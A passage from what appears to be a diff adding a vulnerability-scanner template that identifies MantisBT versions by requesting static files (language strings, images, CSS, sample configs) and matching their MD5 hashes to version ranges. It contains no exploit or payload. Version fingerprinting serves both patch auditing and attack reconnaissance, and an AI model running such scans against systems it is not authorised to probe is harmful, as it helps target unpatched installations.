"(\"e6d973f1f82177fe3c16080cf33c9ece\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/plugins/MantisCoreFormatting/lang/strings_id.txt" + + matchers: + - type: dsl + name: 1.3.4 - 2.11.1 + dsl: + - "(\"087d1d512f8cb3545c69dec204f7e1b3\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/plugins/MantisCoreFormatting/lang/strings_lithuanian.txt" + + matchers: + - type: dsl + name: 1.3.0 - 2.24.3 + dsl: + - "(\"624c0c6270fb8ec55f4582efae4e02fe\" == md5(body))" + - type: dsl + name: 1.2.9 - 1.2.10 + dsl: + - "(\"5a014567e6ce574a163951ebd244c3ff\" == md5(body))" + - type: dsl + name: 1.2.6 - 1.2.8 + dsl: + - "(\"d362ec44c419df16ff28b63d7dc1f319\" == md5(body))" + - type: dsl + name: 1.2.17 - 1.2.20 + dsl: + - "(\"eaa7242924990b47a9b628bff0d6e959\" == md5(body))" + - type: dsl + name: 1.2.13 - 1.2.16 + dsl: + - "(\"12107578445762ba5b953af2ad8bad8b\" == md5(body))" + - type: dsl + name: 1.2.11 - 1.2.12 + dsl: + - "(\"12ad25d71829f673f8bc6bc6fbdcdab5\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/plugins/MantisCoreFormatting/lang/strings_dsb.txt" + + matchers: + - type: dsl + name: 1.3.4 - 2.11.1 + dsl: + - "(\"97f3ce751f4dfb82997bd3d245acda27\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/plugins/MantisCoreFormatting/lang/strings_romanian.txt" + + matchers: + - type: dsl + name: 1.3.0 - 2.24.3 + dsl: + - "(\"6f23549d103ee13d2d709d5cb8165554\" == md5(body))" + - type: dsl + name: 1.2.9 - 1.2.10 + dsl: + - "(\"b1e5cdc5e74fc4cfc3a129b1ad0951b9\" == md5(body))" + - type: dsl + name: 1.2.17 - 1.2.20 + dsl: + - "(\"f8d22ce1111ea108d0bd959d9a707acd\" == md5(body))" + - type: dsl + name: 1.2.13 - 1.2.16 + dsl: + - "(\"1d7f83dcc5414ee097ae6fb197db536d\" == md5(body))" + - type: dsl + name: 1.2.11 - 1.2.12 + dsl: + - "(\"7853eb4f4082462f4f85f2f4702c04bf\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/plugins/MantisCoreFormatting/lang/strings_polish.txt" + + matchers: + - type: dsl + name: 2.1.0 - 2.24.3 + dsl: + - "(\"d24a26abfed70666552e3e71011e5354\" == md5(body))" + - type: dsl + name: 1.3.0 - 2.0.1 + dsl: + - "(\"04a5d3dd181a8765e04f7bc9b64f3887\" == md5(body))" + - type: dsl + name: 1.2.9 - 1.2.10 + dsl: + - "(\"4c4fb6158b1501722a0d588b32ddb192\" == md5(body))" + - type: dsl + name: 1.2.17 - 1.2.20 + dsl: + - "(\"5668387bbcee41e3e656d4b1f56d3f0e\" == md5(body))" + - type: dsl + name: 1.2.13 - 1.2.16 + dsl: + - "(\"c498f4f80d047ed7449e68e440b991c3\" == md5(body))" + - type: dsl + name: 1.2.11 - 1.2.12 + dsl: + - "(\"5de9d4b8c3b5549fa7da5f08cd6fe132\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/plugins/MantisCoreFormatting/lang/strings_bs.txt" + + matchers: + - type: dsl + name: 1.3.4 - 2.11.1 + dsl: + - "(\"f55e61df281638764528015435d4bc38\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/plugins/MantisCoreFormatting/lang/strings_ukrainian.txt" + + matchers: + - type: dsl + name: 2.6.0 - 2.24.3 + dsl: + - "(\"2822d2d05681912987fc1f8c427826ce\" == md5(body))" + - type: dsl + name: 1.3.0 - 2.5.2 + dsl: + - "(\"ca5bc802e0651ac299eb679f07866f4c\" == md5(body))" + - type: dsl + name: 1.2.17 - 1.2.20 + dsl: + - "(\"c608d833cba26560dab7844f65345b9d\" == md5(body))" + - type: dsl + name: 1.2.13 - 1.2.16 + dsl: + - "(\"85a270165812a4ad54e1eef0ba45a01c\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/plugins/MantisCoreFormatting/lang/strings_breton.txt" + + matchers: + - type: dsl + name: 2.3.0 - 2.24.3 + dsl: + - "(\"ee758db7ec8f0c8ee0baab5d6cac6ac4\" == md5(body))" + - type: dsl + name: 2.2.0 - 2.2.4 + dsl: + - "(\"44b53cc23fc8a04bfc8d201d75614f14\" == md5(body))" + - type: dsl + name: 1.3.0 - 2.1.3 + dsl: + - "(\"0b67848038f4f35d886767166ff36355\" == md5(body))" + - type: dsl + name: 1.2.9 - 1.2.10 + dsl: + - "(\"42b8412c51202132cee0d63b6e23f3e6\" == md5(body))" + - type: dsl + name: 1.2.5 - 1.2.8 + dsl: + - "(\"37b27ce9be1769c2e9470a21e3bb1523\" == md5(body))" + - type: dsl + name: 1.2.2 - 1.2.4 + dsl: + - "(\"3e4bf5eec12154b9a5dbcc68c7670fed\" == md5(body))" + - type: dsl + name: 1.2.17 - 1.2.20 + dsl: + - "(\"4ba5c1c5c20f29be11b95395b4715c49\" == md5(body))" + - type: dsl + name: 1.2.13 - 1.2.16 + dsl: + - "(\"adcbc94017084e39f20841578dbdcb54\" == md5(body))" + - type: dsl + name: 1.2.11 - 1.2.12 + dsl: + - "(\"a4aa49b578f4a321523cad38fd8c1b56\" == md5(body))" + - type: dsl + name: 1.2.0 - 1.2.1 + dsl: + - "(\"63c4ff65bc9c45857ff356c71a40b9f9\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/plugins/MantisCoreFormatting/lang/strings_hungarian.txt" + + matchers: + - type: dsl + name: 2.5.0 - 2.24.3 + dsl: + - "(\"851a2c37d75e83418aa8e01c61878daf\" == md5(body))" + - type: dsl + name: 1.3.0 - 2.4.2 + dsl: + - "(\"47d2b62cbc54ebd2156422d8e5a9fa17\" == md5(body))" + - type: dsl + name: 1.2.9 - 1.2.10 + dsl: + - "(\"46674b880f45530f55750742b93f6165\" == md5(body))" + - type: dsl + name: 1.2.5 - 1.2.8 + dsl: + - "(\"101010ddabf3adedfefd8853acc6e8ee\" == md5(body))" + - type: dsl + name: 1.2.2 - 1.2.4 + dsl: + - "(\"4c52a5065064391aa0e9f5e0c6e91b50\" == md5(body))" + - type: dsl + name: 1.2.17 - 1.2.20 + dsl: + - "(\"5ebea5a54f74999b1b6c20794e3f8d1b\" == md5(body))" + - type: dsl + name: 1.2.13 - 1.2.16 + dsl: + - "(\"17ad7f7dc960f75539780722bb44417b\" == md5(body))" + - type: dsl + name: 1.2.11 - 1.2.12 + dsl: + - "(\"26bab7865c7b6620f990f4571d19fd12\" == md5(body))" + - type: dsl + name: 1.2.0 - 1.2.1 + dsl: + - "(\"212cd2b49fd25b1d315f6f6038d5780d\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/plugins/MantisCoreFormatting/lang/strings_macedonian.txt" + + matchers: + - type: dsl + name: 2.1.0 - 2.24.3 + dsl: + - "(\"0900f28563f71fffbe1d38890f3f59f8\" == md5(body))" + - type: dsl + name: 1.3.0 - 2.0.1 + dsl: + - "(\"858e3be8516196d689fa4eb70c13d80a\" == md5(body))" + - type: dsl + name: 1.2.9 - 1.2.10 + dsl: + - "(\"bc3c13e82b9e4cccc3d34ed789f261ad\" == md5(body))" + - type: dsl + name: 1.2.5 - 1.2.8 + dsl: + - "(\"777d5c6f2bc34ed8ffbe3b408a4dcedf\" == md5(body))" + - type: dsl + name: 1.2.2 - 1.2.4 + dsl: + - "(\"3c8ae851f4933715a8e2f932bd4c6e57\" == md5(body))" + - type: dsl + name: 1.2.17 - 1.2.20 + dsl: + - "(\"ef66b0ad90d0192a18e221a67c15ad9d\" == md5(body))" + - type: dsl + name: 1.2.13 - 1.2.16 + dsl: + - "(\"51b36b3a599121a2c3e77423fe46ad85\" == md5(body))" + - type: dsl + name: 1.2.11 - 1.2.12 + dsl: + - "(\"7091b56660fb671b2d4d45caa6112c5b\" == md5(body))" + - type: dsl + name: 1.2.0 - 1.2.1 + dsl: + - "(\"aee08c6f5db3ed3bcda863fcb0a7dc44\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/plugins/MantisCoreFormatting/lang/strings_basque.txt" + + matchers: + - type: dsl + name: 1.3.0 - 2.24.3 + dsl: + - "(\"0feacbbeb92d4dd844059ae2bf622a53\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/plugins/MantisCoreFormatting/lang/strings_english.txt" + + matchers: + - type: dsl + name: 2.1.0 - 2.24.3 + dsl: + - "(\"1ce6b4d627841021127d6959f9b0390a\" == md5(body))" + - type: dsl + name: 1.3.0 - 2.0.1 + dsl: + - "(\"8c75871924437fc3e13e3a18ffffd675\" == md5(body))" + - type: dsl + name: 1.2.9 - 1.2.12 + dsl: + - "(\"019e27f46d166dfc3256581f5039b9f7\" == md5(body))" + - type: dsl + name: 1.2.5 - 1.2.8 + dsl: + - "(\"10bb22cb9125ce84d4b1b14f4d2989b4\" == md5(body))" + - type: dsl + name: 1.2.0 - 1.2.4 + dsl: + - "(\"bfa00b8fca0938d55b30849cd5a24529\" == md5(body))" + - type: dsl + name: 1.2.17 - 1.2.20 + dsl: + - "(\"dda9d4dd702eb21e787b31eace5e2aed\" == md5(body))" + - type: dsl + name: 1.2.13 - 1.2.16 + dsl: + - "(\"7ba1f77c16bccce9a3bd6b6c22460bb3\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/plugins/MantisCoreFormatting/lang/strings_bn.txt" + + matchers: + - type: dsl + name: 1.3.4 - 2.11.1 + dsl: + - "(\"b28a1a09bd1384038644197a5981e04e\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/plugins/MantisCoreFormatting/lang/strings_shi.txt" + + matchers: + - type: dsl + name: 1.3.4 - 2.11.1 + dsl: + - "(\"445bff125e0095bc90f4123c7eb074d0\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/plugins/MantisCoreFormatting/lang/strings_diq.txt" + + matchers: + - type: dsl + name: 1.3.4 - 2.11.1 + dsl: + - "(\"105ac32dcf6af2067036ad35a608c7a7\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/plugins/MantisCoreFormatting/lang/strings_lb.txt" + + matchers: + - type: dsl + name: 1.3.4 - 2.11.1 + dsl: + - "(\"db05d0e638e5f1a458b1e85fb2e80922\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/plugins/MantisCoreFormatting/lang/strings_hsb.txt" + + matchers: + - type: dsl + name: 1.3.4 - 2.11.1 + dsl: + - "(\"beb3ab125bc3235bdf74e65c1254a784\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/plugins/MantisCoreFormatting/lang/strings_afrikaans.txt" + + matchers: + - type: dsl + name: 1.3.0 - 2.24.3 + dsl: + - "(\"e48eb6133198884f844f8c1e1c318c51\" == md5(body))" + - type: dsl + name: 1.2.9 - 1.2.12 + dsl: + - "(\"753e24c164c5125df56aef1809b455eb\" == md5(body))" + - type: dsl + name: 1.2.5 - 1.2.8 + dsl: + - "(\"710d1d89e434745f1276ef323e32acbb\" == md5(body))" + - type: dsl + name: 1.2.2 - 1.2.4 + dsl: + - "(\"cb27506f2da4f0e3edc6824562478e83\" == md5(body))" + - type: dsl + name: 1.2.17 - 1.2.20 + dsl: + - "(\"0885826dc6d2bd6b5ea652248351757d\" == md5(body))" + - type: dsl + name: 1.2.13 - 1.2.16 + dsl: + - "(\"fd42473644f0f4a36287e8a1d77b80eb\" == md5(body))" + - type: dsl + name: 1.2.0 - 1.2.1 + dsl: + - "(\"291d38366ed9a39d9267828b7c5bbc82\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/plugins/MantisCoreFormatting/lang/strings_zh-hk.txt" + + matchers: + - type: dsl + name: 1.3.4 - 2.24.3 + dsl: + - "(\"c510eb7d4d4fb00c4ee01bdd82a711b4\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/plugins/MantisCoreFormatting/lang/strings_dutch.txt" + + matchers: + - type: dsl + name: 2.6.0 - 2.24.3 + dsl: + - "(\"fea1297edfdd0a2053d19fcfb5c7badc\" == md5(body))" + - type: dsl + name: 2.1.0 - 2.5.2 + dsl: + - "(\"740fcdc19aad56925e04ac992ef83559\" == md5(body))" + - type: dsl + name: 1.3.0 - 2.0.1 + dsl: + - "(\"193927332d7d2914cda54b197341d6f4\" == md5(body))" + - type: dsl + name: 1.2.9 - 1.2.12 + dsl: + - "(\"cbb74cb09ea3a17bc634172d8210165c\" == md5(body))" + - type: dsl + name: 1.2.5 - 1.2.8 + dsl: + - "(\"a28c7fbf5cb833059ae0aac83db696a9\" == md5(body))" + - type: dsl + name: 1.2.2 - 1.2.4 + dsl: + - "(\"b18e78613a57002a68db625fc8bbe308\" == md5(body))" + - type: dsl + name: 1.2.17 - 1.2.20 + dsl: + - "(\"ffd7a009f4bc964173c29965095d2791\" == md5(body))" + - type: dsl + name: 1.2.13 - 1.2.16 + dsl: + - "(\"f9adcd64c3cd60007f61611172756efb\" == md5(body))" + - type: dsl + name: 1.2.0 - 1.2.1 + dsl: + - "(\"c710f0ddfe372dbac770948b8fb0b92a\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/plugins/MantisCoreFormatting/lang/strings_russian.txt" + + matchers: + - type: dsl + name: 2.3.0 - 2.16.1 + dsl: + - "(\"c1f09c4c09c4a167fc1ea041be6a0037\" == md5(body))" + - type: dsl + name: 1.3.0 - 2.2.4 + dsl: + - "(\"04acb2dd5c2ac516f48989cd146b46fe\" == md5(body))" + - type: dsl + name: 1.2.9 - 1.2.10 + dsl: + - "(\"323f1013918fc27a67eb9d2f06b76161\" == md5(body))" + - type: dsl + name: 1.2.5 - 1.2.8 + dsl: + - "(\"930c0f21d2cead2807bfdacc6dc6545d\" == md5(body))" + - type: dsl + name: 1.2.2 - 1.2.4 + dsl: + - "(\"363e4683c8e2815c56b005254a065603\" == md5(body))" + - type: dsl + name: 1.2.17 - 1.2.20 + dsl: + - "(\"c5c8ea844b12a6e8086cdfad31c08986\" == md5(body))" + - type: dsl + name: 1.2.13 - 1.2.16 + dsl: + - "(\"1ac9abfcd9bf09630acd840e4312382d\" == md5(body))" + - type: dsl + name: 1.2.11 - 1.2.12 + dsl: + - "(\"2b47d79d8d21f46f990e32dcc10a81a0\" == md5(body))" + - type: dsl + name: 1.2.0 - 1.2.1 + dsl: + - "(\"5ebdf44e875ae1f1eec3b7aae2144956\" == md5(body))" + - type: dsl + name: 2.17.0 - 2.24.3 + dsl: + - "(\"6306251a69ff266a975742e4cf1b6e5a\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/plugins/MantisCoreFormatting/lang/strings_occitan.txt" + + matchers: + - type: dsl + name: 1.3.0 - 2.24.3 + dsl: + - "(\"a3dfe8f9dd17063d18b664df68dddf71\" == md5(body))" + - type: dsl + name: 1.2.9 - 1.2.10 + dsl: + - "(\"946c64a30ef9af620da749a4ac122a36\" == md5(body))" + - type: dsl + name: 1.2.5 - 1.2.8 + dsl: + - "(\"3bb81641f1abec9ca915f93d1a20769e\" == md5(body))" + - type: dsl + name: 1.2.2 - 1.2.4 + dsl: + - "(\"584754ee29365dbb36f7dcf7803d9850\" == md5(body))" + - type: dsl + name: 1.2.17 - 1.2.20 + dsl: + - "(\"a0775c89a29426995e34590041a0189d\" == md5(body))" + - type: dsl + name: 1.2.13 - 1.2.16 + dsl: + - "(\"f871b6b58fbe254f749778635e2051bd\" == md5(body))" + - type: dsl + name: 1.2.11 - 1.2.12 + dsl: + - "(\"36dc76debec38c253d35902211e224f1\" == md5(body))" + - type: dsl + name: 1.2.0 - 1.2.1 + dsl: + - "(\"43bf65467232b90f9f63ceb6c7909c63\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/plugins/MantisCoreFormatting/lang/strings_danish.txt" + + matchers: + - type: dsl + name: 2.6.0 - 2.24.3 + dsl: + - "(\"0a57d7604efc7a94fc65888f171c91c5\" == md5(body))" + - type: dsl + name: 1.3.0 - 2.5.2 + dsl: + - "(\"e617009e813265e5a78e115546cd9f16\" == md5(body))" + - type: dsl + name: 1.2.17 - 1.2.20 + dsl: + - "(\"6eb16027e397cba06561deca7b0f2c0d\" == md5(body))" + - type: dsl + name: 1.2.13 - 1.2.16 + dsl: + - "(\"6a8b42b1221ea2609c3e3ecf6e747387\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/plugins/MantisGraph/lang/strings_volapuk.txt" + + matchers: + - type: dsl + name: 2.0.0 - 2.24.3 + dsl: + - "(\"56fb00dd7ef43ed38f03ae096ab2fa23\" == md5(body))" + - type: dsl + name: 1.3.0 - 1.3.20 + dsl: + - "(\"e7ea5ad3748aa859c1c1a3104094ce81\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/plugins/MantisGraph/lang/strings_estonian.txt" + + matchers: + - type: dsl + name: 2.1.0 - 2.24.3 + dsl: + - "(\"88750ba4a95cac93292ab62da3a321f0\" == md5(body))" + - type: dsl + name: 1.3.0 - 2.0.1 + dsl: + - "(\"64378754f81bde65e35c2c72494a6d2b\" == md5(body))" + - type: dsl + name: 1.2.9 - 1.2.10 + dsl: + - "(\"aaa160c7e0eef59c06a96934a9499c96\" == md5(body))" + - type: dsl + name: 1.2.5 - 1.2.8 + dsl: + - "(\"c3006e26d84c41bccd66265aad8bc93a\" == md5(body))" + - type: dsl + name: 1.2.2 - 1.2.4 + dsl: + - "(\"b83b18acb337f4aef3091c978e120c5b\" == md5(body))" + - type: dsl + name: 1.2.17 - 1.2.20 + dsl: + - "(\"c5178978bab4792fe5423b20e73bf4d8\" == md5(body))" + - type: dsl + name: 1.2.13 - 1.2.16 + dsl: + - "(\"72a12427b3582183c9b394b9e4d9a4a2\" == md5(body))" + - type: dsl + name: 1.2.11 - 1.2.12 + dsl: + - "(\"be07b842973a6ac2ebe7ed17c9c68cc1\" == md5(body))" + - type: dsl + name: 1.2.0 - 1.2.1 + dsl: + - "(\"63535714f45b893fd5cb3c1964ba5fe6\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/plugins/MantisGraph/lang/strings_pms.txt" + + matchers: + - type: dsl + name: 2.1.0 - 2.11.1 + dsl: + - "(\"96cb5bd0e47bd93bd8084957a61fa38d\" == md5(body))" + - type: dsl + name: 1.3.4 - 2.0.1 + dsl: + - "(\"dab4247ea1fbaad3faf5f74e263a1d72\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/plugins/MantisGraph/lang/strings_basque.txt" + + matchers: + - type: dsl + name: 2.0.0 - 2.24.3 + dsl: + - "(\"463eff7c5bcf0bae354b68eb05907f57\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/plugins/MantisGraph/lang/strings_diq.txt" + + matchers: + - type: dsl + name: 2.2.0 - 2.11.1 + dsl: + - "(\"40099f192db7e6d7639e4aaeac2b7073\" == md5(body))" + - type: dsl + name: 2.1.0 - 2.1.3 + dsl: + - "(\"63f0a0ac8e4e25492af90443fbe93d19\" == md5(body))" + - type: dsl + name: 1.3.4 - 2.0.1 + dsl: + - "(\"ea0554d4fcd60e0d8994a71e73212ec4\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/plugins/MantisGraph/lang/strings_lb.txt" + + matchers: + - type: dsl + name: 2.1.0 - 2.11.1 + dsl: + - "(\"f93dec68c192060839049290bc9e26e9\" == md5(body))" + - type: dsl + name: 1.3.4 - 2.0.1 + dsl: + - "(\"1b7e49a07466ea982e23129a3a614664\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/plugins/MantisGraph/lang/strings_afrikaans.txt" + + matchers: + - type: dsl + name: 2.0.0 - 2.24.3 + dsl: + - "(\"351937d046d677714afebb3454b5bd0c\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/plugins/MantisGraph/files/chart.bundle-2.1.6.min.js" + + matchers: + - type: dsl + name: 2.0.0 - 2.19.1 + dsl: + - "(\"3b380eb97c78234a96561966fad2a157\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/plugins/MantisGraph/files/chart-2.1.6.min.js" + + matchers: + - type: dsl + name: 2.0.0 - 2.19.1 + dsl: + - "(\"1e8e9c1d385ae1dc4a399202c4f6dc33\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/library/utf8/TODO.tsk" + + matchers: + - type: dsl + name: 1.2.0 - 2.12.2 + dsl: + - "(\"88c7ccd500c967b9bc262bf3004c700b\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/library/utf8/README" + + matchers: + - type: dsl + name: 1.3.0 - 2.12.2 + dsl: + - "(\"6c149822753f94a947c04d3a6ff734ad\" == md5(body))" + - type: dsl + name: 1.2.0 - 1.2.20 + dsl: + - "(\"4024f74c740ba9ce69904a0b0ef1224c\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/library/utf8/index.html" + + matchers: + - type: dsl + name: 1.2.0 - 2.8.0 + dsl: + - "(\"d41d8cd98f00b204e9800998ecf8427e\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/library/utf8/LICENSE" + + matchers: + - type: dsl + name: 1.2.0 - 2.12.2 + dsl: + - "(\"a6f89e2100d9b6cdffcea4f398e37343\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/library/utf8/readme_mantis.txt" + + matchers: + - type: dsl + name: 1.2.0 - 2.12.2 + dsl: + - "(\"91d0f0026960ceb576e4d03b0c1dcd6f\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/library/utf8/ChangeLog" + + matchers: + - type: dsl + name: 1.2.0 - 2.12.2 + dsl: + - "(\"c20529c9a04cf8598bdc7a757a4a155a\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/library/Web.config" + + matchers: + - type: dsl + name: 1.3.0 - 2.24.3 + dsl: + - "(\"1dc7932b270a5371ac7a4ffde778787e\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/library/rssbuilder/doc/changelog_rssbuilder.htm" + + matchers: + - type: dsl + name: 1.2.0 - 2.24.3 + dsl: + - "(\"d18962e08e9866e278fa1c88e926009d\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/library/rssbuilder/doc/doc.css" + + matchers: + - type: dsl + name: 1.2.0 - 2.24.3 + dsl: + - "(\"bac24ba690bfb154d0214328886b3d18\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/library/rssbuilder/readme_mantis.txt" + + matchers: + - type: dsl + name: 1.2.0 - 2.24.3 + dsl: + - "(\"846cbe1ecf0cd77fcd9ac8c9be881cba\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/images/rel_related.png" + + matchers: + - type: dsl + name: 2.0.0 - 2.24.3 + dsl: + - "(\"fc4effc89a2adb30d56ac23574bd2add\" == md5(body))" + - type: dsl + name: 1.0.0 - 1.3.20 + dsl: + - "(\"9e637c5a7dd1125fd4b8a9883703e079\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/images/favicon.ico" + + matchers: + - type: dsl + name: 1.2.9 - 2.24.3 + dsl: + - "(\"701bb703b31f99da18251ca2e557edf0\" == md5(body))" + - type: dsl + name: 1.1.0 - 1.2.8 + dsl: + - "(\"ebe293e1746858d2548bca99c43e4969\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/images/rel_duplicate.png" + + matchers: + - type: dsl + name: 2.0.0 - 2.24.3 + dsl: + - "(\"c10a9d153ff42244d96574645b5a2958\" == md5(body))" + - type: dsl + name: 1.0.0 - 1.3.20 + dsl: + - "(\"a4577a9f7a4d931d72f2532c3b2b6261\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/images/rel_dependant.png" + + matchers: + - type: dsl + name: 2.0.0 - 2.24.3 + dsl: + - "(\"67ced7af0bc90975d6a86deb960c48cd\" == md5(body))" + - type: dsl + name: 1.0.0 - 1.3.20 + dsl: + - "(\"2ffe64a0740a34fa2dc1f80a307cc8a6\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/images/avatar.png" + + matchers: + - type: dsl + name: 1.3.0 - 2.24.3 + dsl: + - "(\"0bca52afdb2b9998132355d716390c9f\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/doc/LICENSE" + + matchers: + - type: dsl + name: 1.3.0 - 2.24.3 + dsl: + - "(\"b234ee4d69f5fce4486a80fdaf4a4263\" == md5(body))" + - type: dsl + name: 1.0.0 - 1.2.20 + dsl: + - "(\"393a5ca445f6965873eca0259a17f833\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/doc/Web.config" + + matchers: + - type: dsl + name: 1.3.0 - 2.24.3 + dsl: + - "(\"1dc7932b270a5371ac7a4ffde778787e\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/doc/ace-theme-license.txt" + + matchers: + - type: dsl + name: 2.2.0 - 2.24.3 + dsl: + - "(\"5bd7f5a1e5e7f1bca0941bd9be8060c5\" == md5(body))" + - type: dsl + name: 2.0.0 - 2.1.3 + dsl: + - "(\"0cb175f442bd1d07ce75eb2c2ed9a788\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/tests/bootstrap.php.sample" + + matchers: + - type: dsl + name: 2.5.0 - 2.24.3 + dsl: + - "(\"bf1280348ac7b6b8d89658eac3cc2f61\" == md5(body))" + - type: dsl + name: 1.3.0 - 2.4.2 + dsl: + - "(\"ed384dc5a4c72454622087a49ebcb0b1\" == md5(body))" + - type: dsl + name: 1.2.0 - 1.2.20 + dsl: + - "(\"3ae3e04f5eb5b535b786203f4312bc84\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/api/soap/mantisconnect.wsdl" + + matchers: + - type: dsl + name: 1.3.0 - 2.16.1 + dsl: + - "(\"5dd3b35ff44fd0d543b3c770a5fc03aa\" == md5(body))" + - type: dsl + name: 1.2.16 - 1.2.20 + dsl: + - "(\"ec9c1197c825d6f90b6f86ee1a585a86\" == md5(body))" + - type: dsl + name: 1.2.13 - 1.2.15 + dsl: + - "(\"eaf74c59497d268734bbc96701a578b4\" == md5(body))" + - type: dsl + name: 2.17.0 - 2.24.3 + dsl: + - "(\"e7919bd7701401cb80d02b04cc45aae6\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/api/soap/wsdl-viewer.xsl" + + matchers: + - type: dsl + name: 2.6.0 - 2.24.3 + dsl: + - "(\"63ab3c525412ec9ee161289f47623aa9\" == md5(body))" + - type: dsl + name: 1.2.20 - 2.5.2 + dsl: + - "(\"d09b7560a3a4b84c4d7a858aacbafb82\" == md5(body))" + - type: dsl + name: 1.2.16 - 1.2.19 + dsl: + - "(\"801703503c552f056e835daacab89127\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/config/config_inc.php.sample" + + matchers: + - type: dsl + name: 1.3.0 - 2.24.3 + dsl: + - "(\"d3db248f11ca75f42b4f7fcf9a82edec\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/config/Web.config" + + matchers: + - type: dsl + name: 1.3.0 - 2.24.3 + dsl: + - "(\"1dc7932b270a5371ac7a4ffde778787e\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/core/Web.config" + + matchers: + - type: dsl + name: 1.3.0 - 2.24.3 + dsl: + - "(\"1dc7932b270a5371ac7a4ffde778787e\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/css/ace-part2.css" + + matchers: + - type: dsl + name: 2.2.0 - 2.24.3 + dsl: + - "(\"b3f6cb894119452ffe2636a9e3b822cf\" == md5(body))" + - type: dsl + name: 2.0.0 - 2.1.3 + dsl: + - "(\"ba9854d732f48d34c3230bf0a5b50d5e\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/css/login.css" + + matchers: + - type: dsl + name: 1.3.0 - 2.24.3 + dsl: + - "(\"8acc5fa176915a30ad99f11b46ca7145\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/css/dropzone-4.3.0.css" + + matchers: + - type: dsl + name: 2.2.0 - 2.19.1 + dsl: + - "(\"e2d1fa5c91f7937a4bf9bc1e10c95dca\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/css/ace-rtl.css" + + matchers: + - type: dsl + name: 2.2.0 - 2.24.3 + dsl: + - "(\"f8bfc9a7398cedd48a836428e15b5d84\" == md5(body))" + - type: dsl + name: 2.0.0 - 2.1.3 + dsl: + - "(\"a9f7e87fcbe2393372bf71544d48cca0\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/css/font-awesome-4.6.3.min.css" + + matchers: + - type: dsl + name: 2.0.0 - 2.24.3 + dsl: + - "(\"4083f5d376eb849a458cc790b53ba080\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/css/images/ui-bg_diagonals-thick_20_666666_40x40.png" + + matchers: + - type: dsl + name: 1.3.0 - 2.24.3 + dsl: + - "(\"d0cc3ffc3dc84d3a7c48867c75e2485f\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/css/images/ui-bg_highlight-soft_75_ffe45c_1x100.png" + + matchers: + - type: dsl + name: 1.3.0 - 2.24.3 + dsl: + - "(\"53acc69aaee6e2cb73b2021317e24af3\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/css/images/ui-bg_glass_75_dadada_1x400.png" + + matchers: + - type: dsl + name: 1.3.0 - 2.24.3 + dsl: + - "(\"c12c6510dad3ebfa64c8a30e959a2469\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/css/images/ui-bg_highlight-soft_75_cccccc_1x100.png" + + matchers: + - type: dsl + name: 1.3.0 - 2.24.3 + dsl: + - "(\"72c593d16e998952cd8d798fee33c6f3\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/css/images/ui-bg_glass_100_f6f6f6_1x400.png" + + matchers: + - type: dsl + name: 1.3.0 - 2.24.3 + dsl: + - "(\"c17f552e8f4697d7608c57653af36df0\" == md5(body))" + + - method: GET + path: + - 